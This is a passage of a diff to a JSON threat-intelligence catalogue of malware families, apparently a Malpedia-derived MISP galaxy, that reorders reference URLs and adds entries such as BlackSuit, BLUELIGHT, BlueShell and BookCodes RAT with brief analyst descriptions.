"https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html", + "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/", + "https://therecord.media/blackmatter-ransomware-says-its-shutting-down-due-to-pressure-from-local-authorities/", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", + "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", + "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", + "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf", + "https://www.mandiant.com/resources/cryptography-blackmatter-ransomware", + "https://www.netskope.com/blog/netskope-threat-coverage-blackmatter", + "https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.mandiant.com/resources/chasing-avaddon-ransomware", + "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809", + "https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/", + "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps", + "https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/", + "https://www.glimps.fr/lockbit3-0/", + "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", + "https://www.nozominetworks.com/blog/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs/", + "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf", + "https://www.youtube.com/watch?v=NIiEcOryLpI", + "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf", + "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus" ], "synonyms": [], "type": [] @@ -15790,13 +16503,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacknet_rat", - "http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html", - "https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware", + "https://github.com/FarisCode511/BlackNET/", "https://labs.k7computing.com/?p=21365", "https://github.com/BlackHacker511/BlackNET/", - "https://github.com/mave12/BlackNET-3.7.0.1", "https://blog.malwarebytes.com/threat-analysis/2020/03/fake-corona-antivirus-distributes-blacknet-remote-administration-tool/", - "https://github.com/FarisCode511/BlackNET/" + "http://www.pwncode.io/2019/12/blacknet-rat-when-you-leave-panel.html", + "https://github.com/mave12/BlackNET-3.7.0.1", + "https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware" ], "synonyms": [], "type": [] @@ -15822,10 +16535,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackpos", - "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/", - "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", "https://usa.visa.com/dam/VCOM/global/support-legal/documents/new-pos-malware-samples.pdf", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/" + "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-blackpos-malware-emerges-in-the-wild-targets-retail-accounts/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/operation-black-atlas-endangers-in-store-card-payments-and-smbs-worldwide-switches-between-blackpos-and-other-tools/" ], "synonyms": [ "Kaptoxa", @@ -15843,9 +16556,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackremote", - "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/", "https://unit42.paloaltonetworks.com/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/", - "https://unit42.paloaltonetworks.jp/blackremote-money-money-money-a-swedish-actor-peddles-an-expensive-new-rat/" + "https://asec.ahnlab.com/en/56405/", + "https://news.sophos.com/en-us/2020/05/14/raticate/" ], "synonyms": [ "BlackRAT" @@ -15872,8 +16586,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackrouter", - "https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/legitimate-application-anydesk-bundled-with-new-ransomware-variant/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/legitimate-application-anydesk-bundled-with-new-ransomware-variant/", + "https://www.bleepingcomputer.com/news/security/blackrouter-ransomware-promoted-as-a-raas-by-iranian-developer/" ], "synonyms": [ "BLACKHEART" @@ -15888,8 +16602,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackruby", - "https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware", - "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/" + "https://www.bleepingcomputer.com/news/security/black-ruby-ransomware-skips-victims-in-iran-and-adds-a-miner-for-good-measure/", + "https://www.acronis.com/en-us/blog/posts/black-ruby-combining-ransomware-and-coin-miner-malware" ], "synonyms": [], "type": [] @@ -15903,10 +16617,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackshades", "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-2-blackshades-net/", - "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html", - "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", "https://blog.malwarebytes.com/threat-analysis/2014/05/taking-off-the-blackshades/", - "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga" + "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", + "https://blog.malwarebytes.com/threat-analysis/2012/06/blackshades-in-syria/", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" ], "synonyms": [], "type": [] @@ -15940,13 +16654,27 @@ "uuid": "58701e4d-87aa-45a5-adfd-9b20f50fea91", "value": "BlackSoul" }, + { + "description": "According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacksuit", + "https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/", + "https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b73202ea-e636-4e70-91b1-f29c1db4cbb1", + "value": "BlackSuit (Windows)" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackworm_rat", - "https://github.com/BlackHacker511/BlackWorm", "https://www.fireeye.com/blog/threat-research/2014/08/connecting-the-dots-syrian-malware-team-uses-blackworm-for-attacks.html", + "https://github.com/BlackHacker511/BlackWorm", "https://www.fidelissecurity.com/threatgeek/archive/down-h-w0rm-hole-houdinis-rat/" ], "synonyms": [], @@ -15969,22 +16697,24 @@ "value": "BleachGap" }, { - "description": "According to SentinelOne, this RAT can gather and transmit a defined set of system features, create/terminate/manipulate processes and files, and has self-updating and deletion capability.", + "description": "BLINDINGCAN is a remote access trojan that communicates with its C&C server via HTTP(S).\r\nIt uses a (custom) RC4 or AES for encryption and decryption of its configuration and network traffic. \r\nIt sends information about the victim's environment, like computer name, IP, Windows product name and processor name.\r\nIt supports around 30 commands that include operations on the victim\u2019s filesystem, basic process management, command line execution, file exfiltration, configuration update, and the download and execution of additional payloads from the attackers' C&C. The commands are indexed by 16-bit integers, starting with the index 0x2009 and going incrementally up to 0x2057, with some indicis being skipped. \r\nIt uses various parameter names in its HTTP POST requests, mostly associated with web servers running bulletin board systems, like bbs, article, boardid, s_board, page, idx_num, etc.\r\nIt contains specific RTTI symbols like \".?AVCHTTP_Protocol@@\", \".?AVCFileRW@@\" or \".?AVCSinSocket@@\".\r\nBLINDINGCAN RAT is a flagship payload deployed in many Lazarus attacks, especially in the Operation DreamJob campaigns happening in 2020-2022.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindingcan", - "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/", - "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf", - "https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/", "https://blogs.jpcert.or.jp/en/2020/09/BLINDINGCAN.html", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a", - "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/", "https://www.mandiant.com/resources/blog/dprk-whatsapp-phishing", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a", "https://www.hvs-consulting.de/lazarus-report/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://www.hvs-consulting.de/media/downloads/ThreatReport-Lazarus.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.sentinelone.com/blog/the-blindingcan-rat-and-malicious-north-korean-activity/", + "https://www.cisa.gov/news-events/analysis-reports/ar20-232a", + "https://www.welivesecurity.com/2022/09/30/amazon-themed-campaigns-lazarus-netherlands-belgium/", + "https://securelist.com/the-lazarus-group-deathnote-campaign/109490/" ], "synonyms": [ - "DRATzarus RAT" + "AIRDRY", + "ZetaNile" ], "type": [] }, @@ -15998,8 +16728,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blindtoad", "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/", "https://baesystemsai.blogspot.com/2017/10/taiwan-heist-lazarus-tools.html", - "https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf", - "https://content.fireeye.com/apt/rpt-apt38" + "https://content.fireeye.com/apt/rpt-apt38", + "https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf" ], "synonyms": [], "type": [] @@ -16012,20 +16742,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blister", - "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html", - "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", - "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt", - "https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html", - "https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign", - "https://redcanary.com/blog/intelligence-insights-january-2022/", "https://twitter.com/MsftSecIntel/status/1522690116979855360", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://elastic.github.io/security-research/malware/2022/05/02.blister/article/", "https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-2/", - "https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-1/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself" + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt", + "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://redcanary.com/blog/intelligence-insights-january-2022/", + "https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html", + "https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader", + "https://killingthebear.jorgetesta.tech/actors/evil-corp", + "https://security-labs.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", + "https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign", + "https://www.trendmicro.com/en_no/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html", + "https://cloudsek.com/technical-analysis-of-code-signed-blister-malware-campaign-part-1/" ], "synonyms": [ "COLORFAKE" @@ -16076,15 +16808,54 @@ "uuid": "3dcfef7b-d657-4ac5-b738-ef793237274b", "value": "BLUEHAZE" }, + { + "description": "Malware family used to deliver follow up payloads, variants using Microsoft Graph API and Google Web Apps have been observed.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluelight", + "https://www.volexity.com/blog/2021/08/17/north-korean-apt-inkysquid-infects-victims-using-browser-exploits/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9c5ec440-2bb8-4485-9811-f2fb52cf76e5", + "value": "BLUELIGHT" + }, + { + "description": "This family contains the BlueNoroff toolkit used for SWIFT manipulation, as used by the Lazarus activity cluster also referred to as BlueNoroff.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluenoroff", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "862e9c13-dde6-473e-a816-a7d7043bf73c", + "value": "BlueNoroff" + }, + { + "description": "According to AhnLab, BlueShell is a backdoor malware developed in Go language, published on Github, and it supports Windows, Linux, and Mac operating systems. Currently, the original Github repository is presumed to have been deleted, but the BlueShell source code can still be obtained from other repositories. It features an explanatory ReadMe file in Chinese, indicating the possibility that the creator is a Chinese user.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.blueshell", + "https://asec.ahnlab.com/ko/56715/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "91d441a6-4244-43a2-9b96-354a2df63a4e", + "value": "BlueShell" + }, { "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluesky", - "https://unit42.paloaltonetworks.com/bluesky-ransomware/", - "https://yoroi.company/research/dissecting-bluesky-ransomware-payload/", "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/", - "https://cloudsek.com/technical-analysis-of-bluesky-ransomware/" + "https://yoroi.company/research/dissecting-bluesky-ransomware-payload/", + "https://cloudsek.com/technical-analysis-of-bluesky-ransomware/", + "https://unit42.paloaltonetworks.com/bluesky-ransomware/" ], "synonyms": [], "type": [] @@ -16097,8 +16868,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluether", - "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", - "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf" + "https://web.archive.org/web/20200229012206/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947724.pdf" ], "synonyms": [ "CAPGELD" @@ -16113,10 +16884,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blustealer", - "https://twitter.com/GoSecure_Inc/status/1437435265350397957", - "https://www.gosecure.net/blog/2021/09/22/gosecure-titan-labs-technical-report-blustealer-malware-threat/", - "https://blog.minerva-labs.com/a-new-blustealer-loader-uses-direct-syscalls-to-evade-edrs", "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://twitter.com/GoSecure_Inc/status/1437435265350397957", + "https://blog.minerva-labs.com/a-new-blustealer-loader-uses-direct-syscalls-to-evade-edrs", + "https://www.gosecure.net/blog/2021/09/22/gosecure-titan-labs-technical-report-blustealer-malware-threat/", "https://decoded.avast.io/anhho/blustealer/", "https://blogs.blackberry.com/en/2021/10/threat-thursday-blustealer-infostealer" ], @@ -16159,8 +16930,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bobik", - "https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/", - "https://decoded.avast.io/martinchlumecky/bobik/" + "https://decoded.avast.io/martinchlumecky/bobik/", + "https://www.sentinelone.com/labs/noname05716-the-pro-russian-hacktivist-group-targeting-nato/" ], "synonyms": [], "type": [] @@ -16199,9 +16970,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bolek", + "https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt", "https://securelist.com/kbot-sometimes-they-come-back/96157/", - "http://www.cert.pl/news/11379", - "https://lokalhost.pl/txt/newest_addition_to_happy_family_kbot.17.05.2015.txt" + "http://www.cert.pl/news/11379" ], "synonyms": [ "KBOT" @@ -16211,6 +16982,26 @@ "uuid": "d3af810f-e657-409c-b821-4b1cf727ad18", "value": "Bolek" }, + { + "description": "BookCodesRAT is a remote access trojan that uses HTTP(S) for communication. It supports around 25 commands that include operations on the victim\u2019s filesystem, basic process management and the download and execution of additional tools from the attacker\u2019s arsenal. They are indexed by 32-bit integers, starting with the value 0x97853646. \r\n\r\nBookCodesRAT uses mostly compromised South Korean web servers for the C&C traffic and is usually deployed against South Korean targets.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2612&attach_file_id=EpF2612.pdf", + "https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2452&attach_file_id=EpF2452.pdf", + "https://vblocalhost.com/uploads/VB2021-Lee-etal.pdf", + "https://www.welivesecurity.com/2020/11/16/lazarus-supply-chain-attack-south-korea/", + "https://vblocalhost.com/uploads/VB2021-Park.pdf" + ], + "synonyms": [ + "BookCodesTea" + ], + "type": [] + }, + "uuid": "433b9a1c-dd2a-4d2b-b469-47b40fc6c196", + "value": "BookCodes RAT" + }, { "description": "This in .Net written malware is a classic information stealer. It can collect various information and can be depoyed in different configurations: \"The full-featured version of the malware can log keystrokes, collect profile files of Mozilla Firefox and Google Chrome browsers, record sound from the microphone, grab desktop screenshots, capture photo from the webcam, and collect information about the version of the operation system and installed anti-virus software.\" (ESET)\r\nThis malware has been active since at least 2012.", "meta": { @@ -16242,9 +17033,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boombox", + "https://cert.pl/posts/2023/04/kampania-szpiegowska-apt29/", "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf", - "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/", - "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/" + "https://r136a1.info/2022/07/19/a-look-into-apt29s-new-early-stage-google-drive-downloader/", + "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/" ], "synonyms": [], "type": [] @@ -16253,13 +17045,13 @@ "value": "BOOMBOX" }, { - "description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate ‘Dwrite.dll’ provided by the Microsoft DirectX Typography Services. The application loads the ‘gdi’ library, which loads the ‘gdiplus’ library, which ultimately loads ‘Dwrite’. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.", + "description": "FireEye describes BOOSTWRITE as a loader crafted to be launched via abuse of the DLL search order of applications which load the legitimate \u2018Dwrite.dll\u2019 provided by the Microsoft DirectX Typography Services. The application loads the \u2018gdi\u2019 library, which loads the \u2018gdiplus\u2019 library, which ultimately loads \u2018Dwrite\u2019. Mandiant identified instances where BOOSTWRITE was placed on the file system alongside the RDFClient binary to force the application to import DWriteCreateFactory from it rather than the legitimate DWrite.dll.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boostwrite", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf" + "https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html" ], "synonyms": [], "type": [] @@ -16272,8 +17064,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bootwreck", - "https://content.fireeye.com/apt/rpt-apt38", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/" + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-latin-american-financial-organizations-again/", + "https://content.fireeye.com/apt/rpt-apt38" ], "synonyms": [ "MBRkiller" @@ -16288,8 +17080,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.boratrat", - "https://blog.cyble.com/2022/03/31/deep-dive-analysis-borat-rat/", "https://www.bleepingcomputer.com/news/security/new-borat-remote-access-malware-is-no-laughing-matter/", + "https://blog.cyble.com/2022/03/31/deep-dive-analysis-borat-rat/", "https://blogs.blackberry.com/en/2022/04/threat-thursday-boratrat" ], "synonyms": [], @@ -16303,9 +17095,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.borr", - "https://telegra.ph/Borr-Malware-02-04", + "https://twitter.com/ViriBack/status/1222704498923032576", "https://github.com/onek1lo/Borr-Stealer", - "https://twitter.com/ViriBack/status/1222704498923032576" + "https://telegra.ph/Borr-Malware-02-04" ], "synonyms": [], "type": [] @@ -16345,8 +17137,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bozok", "https://unit42.paloaltonetworks.com/unit42-projectm-link-found-between-pakistani-actor-and-operation-transparent-tribe", - "https://securelist.com/apt-trends-report-q1-2021/101967/", - "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", + "https://securelist.com/apt-trends-report-q1-2021/101967/" ], "synonyms": [], "type": [] @@ -16368,21 +17160,21 @@ "value": "BRAIN" }, { - "description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim’s networks.", + "description": "Brambul is a worm that spreads by using a list of hard-coded login credentials to launch a brute-force password attack against an SMB protocol for access to a victim\u2019s networks.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", - "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2", - "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1", - "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", - "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://www.secureworks.com/research/threat-profiles/nickel-academy", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/", - "https://www.us-cert.gov/ncas/alerts/TA18-149A", + "https://swanleesec.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2", "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-1", - "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments" + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://metaswan.github.io/posts/Malware-Lazarus-group's-Brambul-worm-of-the-former-Wannacry-2", + "https://www.us-cert.gov/ncas/alerts/TA18-149A" ], "synonyms": [ "SORRYBRUTE" @@ -16432,7 +17224,7 @@ "value": "BreachRAT" }, { - "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\хп-пробив\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", + "description": "There is no reference available for this family and all known samples have version 1.0.0.\r\n\r\nPdb-strings in the samples suggest that this is an \"exclusive\" loader, known as \"breakthrough\" (maybe), e.g. C:\\Users\\Exclusiv\\Desktop\\\u0445\u043f-\u043f\u0440\u043e\u0431\u0438\u0432\\Release\\build.pdb\r\n\r\nThe communication url parameters are pretty unique in this combination:\r\ngate.php?hwid=&os=&build=1.0.0&cpu=8\r\n\r\n is one of:\r\nWindows95\r\nWindows98\r\nWindowsMe\r\nWindows95family\r\nWindowsNT3\r\nWindowsNT4\r\nWindows2000\r\nWindowsXP\r\nWindowsServer2003\r\nWindowsNTfamily\r\nWindowsVista\r\nWindows7\r\nWindows8\r\nWindows10\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" @@ -16449,8 +17241,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bredolab", "https://securelist.com/end-of-the-line-for-the-bredolab-botnet/36335/", - "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", - "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html" + "https://www.fireeye.com/blog/threat-research/2010/10/bredolab-its-not-the-size-of-the-dog-in-fight.html", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf" ], "synonyms": [], "type": [] @@ -16517,9 +17309,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brushaloader", + "https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/", "https://www.proofpoint.com/us/threat-insight/post/brushaloader-still-sweeping-victims-one-year-later", - "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html", - "https://www.cert.pl/en/news/single/brushaloader-gaining-new-layers-like-a-pro/" + "https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html" ], "synonyms": [], "type": [] @@ -16532,22 +17324,26 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4", - "https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb", + "https://www.splunk.com/en_us/blog/security/deliver-a-strike-by-reversing-a-badger-brute-ratel-detection-and-analysis.html", "https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/", - "https://0xdarkvortex.dev/hiding-in-plainsight/", - "https://protectedmo.de/brute.html", - "https://twitter.com/embee_research/status/1580030303950995456?s=20&t=0vfXnrCXaVSX-P-hiSrFwA", - "https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f", - 